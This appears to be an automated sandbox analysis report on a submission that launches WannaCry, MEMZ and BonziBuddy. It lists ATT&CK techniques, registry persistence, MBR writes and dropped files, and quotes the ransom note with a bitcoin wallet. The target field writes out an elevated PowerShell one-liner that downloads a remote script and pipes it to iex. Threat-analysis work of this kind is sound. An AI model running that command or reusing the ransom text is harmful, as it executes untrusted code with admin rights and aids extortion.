wannacry | hxxp://start-process PowerShell -verb runas irm hxxps://raw[.]githubusercontent[.]com/Lachine1/xmrig-scripts/main/windows[.]ps1 | iex

Analysis

max time kernel
944s
max time network
948s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29-11-2024 12:19

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Score

10^/10

wannacry bootkit defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware worm

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0"	systempropertiesadvanced.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	systempropertiesadvanced.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	tv_enua.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	MSAGENT.EXE

Downloads MZ/PE file

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 14 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger = "rekt.exe"	MEMZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe	MEMZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe	MEMZ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shutdown.exe\Debugger = "rekt.exe"	MEMZ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonui.exe\Debugger = "rekt.exe"	MEMZ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "rekt.exe"	MEMZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe	MEMZ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger = "rekt.exe"	MEMZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shutdown.exe	MEMZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	MEMZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe	MEMZ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "rekt.exe"	MEMZ.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonui.exe	MEMZ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "rekt.exe"	MEMZ.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	VineMemz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	MEMZ.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD4E27.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD4E2E.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 46 IoCs

pid	Process
5608	butterflyondesktop.exe
4788	butterflyondesktop.tmp
2020	myfriendpingu.exe
5868	MSAGENT.EXE
5840	tv_enua.exe
1872	AgentSvr.exe
3620	ButterflyOnDesktop.exe
6404	Pingu.exe
6756	BonziBDY_4.EXE
5164	AgentSvr.exe
1160	BonziBDY_2.EXE
4700	Pingu.exe
5420	VineMemz.exe
5672	taskdl.exe
5884	MEMZ.exe
2792	@[email protected]
1944	@[email protected]
2720	taskhsvc.exe
5084	taskdl.exe
4644	taskse.exe
5724	@[email protected]
6892	taskdl.exe
1400	taskse.exe
4472	@[email protected]
5556	taskse.exe
5400	@[email protected]
6056	taskdl.exe
6936	taskse.exe
4092	@[email protected]
6324	taskdl.exe
6056	taskse.exe
1848	@[email protected]
3832	taskdl.exe
6192	tree.exe
1844	taskse.exe
5860	@[email protected]
1148	taskdl.exe
4244	taskse.exe
6952	@[email protected]
5208	taskdl.exe
992	taskse.exe
4832	@[email protected]
1736	taskdl.exe
8152	taskse.exe
8168	@[email protected]
7208	taskdl.exe

Loads dropped DLL 53 IoCs

pid	Process
2872	BonziBuddy432.exe
2872	BonziBuddy432.exe
2872	BonziBuddy432.exe
2872	BonziBuddy432.exe
2872	BonziBuddy432.exe
2872	BonziBuddy432.exe
2872	BonziBuddy432.exe
2872	BonziBuddy432.exe
2872	BonziBuddy432.exe
2872	BonziBuddy432.exe
2872	BonziBuddy432.exe
5840	tv_enua.exe
2936	regsvr32.exe
2936	regsvr32.exe
3624	regsvr32.exe
5868	MSAGENT.EXE
3256	regsvr32.exe
5180	regsvr32.exe
3260	regsvr32.exe
456	regsvr32.exe
5280	regsvr32.exe
5116	regsvr32.exe
5352	regsvr32.exe
6364	MsiExec.exe
6756	BonziBDY_4.EXE
6756	BonziBDY_4.EXE
6756	BonziBDY_4.EXE
6756	BonziBDY_4.EXE
6756	BonziBDY_4.EXE
6756	BonziBDY_4.EXE
5164	AgentSvr.exe
5164	AgentSvr.exe
5164	AgentSvr.exe
1160	BonziBDY_2.EXE
1160	BonziBDY_2.EXE
1160	BonziBDY_2.EXE
1160	BonziBDY_2.EXE
1160	BonziBDY_2.EXE
1160	BonziBDY_2.EXE
5164	AgentSvr.exe
5164	AgentSvr.exe
6756	BonziBDY_4.EXE
6756	BonziBDY_4.EXE
1160	BonziBDY_2.EXE
2720	taskhsvc.exe
2720	taskhsvc.exe
2720	taskhsvc.exe
2720	taskhsvc.exe
2720	taskhsvc.exe
2720	taskhsvc.exe
2720	taskhsvc.exe
2720	taskhsvc.exe
6756	BonziBDY_4.EXE

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2616	icacls.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DesktopXmasTree = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Data\\tree.exe"	tree.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop = "C:\\Program Files (x86)\\Butterfly on Desktop\\ButterflyOnDesktop.exe"	ButterflyOnDesktop.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o"	InfDefaultInstall.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop	butterflyondesktop.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\tv_enua = "RunDll32 advpack.dll,LaunchINFSection C:\\Windows\\INF\\tv_enua.inf, RemoveCabinet"	tv_enua.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\nzfbkoaczl750 = "\"C:\\Users\\Admin\\Desktop\\tasksche.exe\""	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\S:	MSIEXEC.EXE
File opened (read-only)	\??\T:	MSIEXEC.EXE
File opened (read-only)	\??\Y:	MSIEXEC.EXE
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	MSIEXEC.EXE
File opened (read-only)	\??\K:	MSIEXEC.EXE
File opened (read-only)	\??\Q:	MSIEXEC.EXE
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	MSIEXEC.EXE
File opened (read-only)	\??\J:	MSIEXEC.EXE
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\P:	MSIEXEC.EXE
File opened (read-only)	\??\W:	MSIEXEC.EXE
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	MSIEXEC.EXE
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\A:	MSIEXEC.EXE
File opened (read-only)	\??\E:	MSIEXEC.EXE
File opened (read-only)	\??\L:	MSIEXEC.EXE
File opened (read-only)	\??\X:	MSIEXEC.EXE
File opened (read-only)	\??\Z:	MSIEXEC.EXE
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	MSIEXEC.EXE
File opened (read-only)	\??\O:	MSIEXEC.EXE
File opened (read-only)	\??\U:	MSIEXEC.EXE
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	MSIEXEC.EXE
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	MSIEXEC.EXE
File opened (read-only)	\??\R:	MSIEXEC.EXE
File opened (read-only)	\??\V:	MSIEXEC.EXE

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
424	raw.githubusercontent.com
425	raw.githubusercontent.com
93	sites.google.com
94	sites.google.com
144	drive.google.com
145	drive.google.com
146	drive.google.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	MEMZ.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\SET67F4.tmp	tv_enua.exe
File created	C:\Windows\SysWOW64\SET67F4.tmp	tv_enua.exe
File opened for modification	C:\Windows\SysWOW64\msvcp50.dll	tv_enua.exe

Sets desktop wallpaper using registry 2 TTPs 4 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Downloads\\Untitled.png"	mspaint.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Data\\Pussy.png"	MEMZ.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\BonziBuddy432\SSCALA32.OCX	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\AutoShortcutsMaker.vbs	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page3.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page4.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\BonziBDY.vbw	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\ManualDirPatcher.vbs	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page13.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb001.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb009.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page10.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page12.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page2.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Apps.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\RACREG32.DLL	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Reg.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Runtimes\MSAGENT.EXE	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\test.vbs	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page8.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page14.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\book	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page9.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\AUTPRX32.DLL	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\j2.nbd-SR	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\t2.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb012.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page5.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page2.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\BonziCheckers.ocx	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\MSCOMCTL.OCX	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\msvcrt.dll	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Snd1.wav	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\speedup.ico	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page15.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page17.htm	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page4.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\BonziBUDDY_Killer.exe	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\chose.bat	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page6.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb010.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page7.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page16.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb002.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page9.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page11.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page18.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Bonzi's Beach Checkers.exe	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\s1.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page6.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page4.jpg	BonziBuddy432.exe
File created	C:\Program Files (x86)\Butterfly on Desktop\is-MK04E.tmp	butterflyondesktop.tmp
File opened for modification	C:\Program Files (x86)\BonziBuddy432\empop3.dll	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\favicon.ico	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Snd2.wav	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\AutoDirPatcher.vbs	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb014.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb015.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Uninstall.exe	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\~GLH0046.TMP	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Intro2.wav	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\ODKOB32.DLL	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\registry.reg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\uninstall.bat	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page14.jpg	BonziBuddy432.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\Cursors\Glib Cursors\SET931.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\unavailable.cur	InfDefaultInstall.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\SETA32.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\lhsp\tv\tvenuax.dll	tv_enua.exe
File opened for modification	C:\Windows\help\Agt0409.hlp	MSAGENT.EXE
File created	C:\Windows\Cursors\Glib Cursors\SET910.tmp	InfDefaultInstall.exe
File created	C:\Windows\Cursors\Glib Cursors\SET943.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\INF\SET67E4.tmp	tv_enua.exe
File created	C:\Windows\msagent\SET6E1E.tmp	MSAGENT.EXE
File created	C:\Windows\Cursors\Glib Cursors\SETA32.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\alternate.cur	InfDefaultInstall.exe
File opened for modification	C:\Windows\lhsp\tv\SET6782.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\SET6E0C.tmp	MSAGENT.EXE
File created	C:\Windows\help\SET6E62.tmp	MSAGENT.EXE
File created	C:\Windows\INF\SET67E4.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\AgentDPv.dll	MSAGENT.EXE
File opened for modification	C:\Windows\Installer\MSIC717.tmp	msiexec.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\SET963.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\SET964.tmp	InfDefaultInstall.exe
File created	C:\Windows\Cursors\Glib Cursors\SET976.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\help\SET6E62.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\Cursors\Glib Cursors\beam.cur	InfDefaultInstall.exe
File opened for modification	C:\Windows\lhsp\tv\SET67C1.tmp	tv_enua.exe
File opened for modification	C:\Windows\lhsp\help\tv_enua.hlp	tv_enua.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\dgn2.cur	InfDefaultInstall.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\SETA45.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\lhsp\help\SET67C2.tmp	tv_enua.exe
File created	C:\Windows\msagent\SET6E40.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\Cursors\Glib Cursors\busy.ani	InfDefaultInstall.exe
File opened for modification	C:\Windows\INF\tv_enua.inf	tv_enua.exe
File opened for modification	C:\Windows\msagent\AgentSvr.exe	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET6E1E.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET6E2F.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\Cursors\Glib Cursors\Pecision Select.cur	InfDefaultInstall.exe
File created	C:\Windows\msagent\SET6E0C.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SET6E51.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Cursors\Glib Cursors\SETA34.tmp	InfDefaultInstall.exe
File created	C:\Windows\lhsp\help\SET67C2.tmp	tv_enua.exe
File opened for modification	C:\Windows\fonts\andmoipa.ttf	tv_enua.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\SET943.tmp	InfDefaultInstall.exe
File created	C:\Windows\lhsp\tv\SET67C1.tmp	tv_enua.exe
File created	C:\Windows\Installer\SourceHash{64945A96-ECA1-4FBE-8C9B-0492298AA8E7}	msiexec.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\SET910.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\dgn1.cur	InfDefaultInstall.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\SETA34.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\msagent\chars\Bonzi.acs	BonziBuddy432.exe
File opened for modification	C:\Windows\msagent\intl\Agt0409.dll	MSAGENT.EXE
File opened for modification	C:\Windows\Cursors\Glib Cursors\Normal Select.cur	InfDefaultInstall.exe
File created	C:\Windows\Cursors\Glib Cursors\SETA45.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\msagent\SET6DFB.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\intl\SET6E63.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\Cursors\Glib Cursors\SET976.tmp	InfDefaultInstall.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\e5ec573.msi	msiexec.exe
File created	C:\Windows\Cursors\Glib Cursors\SET911.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\help.cur	InfDefaultInstall.exe
File opened for modification	C:\Windows\Cursors\Glib Cursors\SET942.tmp	InfDefaultInstall.exe
File created	C:\Windows\Cursors\Glib Cursors\SETA33.tmp	InfDefaultInstall.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\fonts\SET67E3.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\AgentSR.dll	MSAGENT.EXE
File created	C:\Windows\msagent\intl\SET6E63.tmp	MSAGENT.EXE
File created	C:\Windows\Cursors\Glib Cursors\SET942.tmp	InfDefaultInstall.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
2244	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BonziBuddy432.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIEXEC.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSAGENT.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	grpconv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BonziBDY_2.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
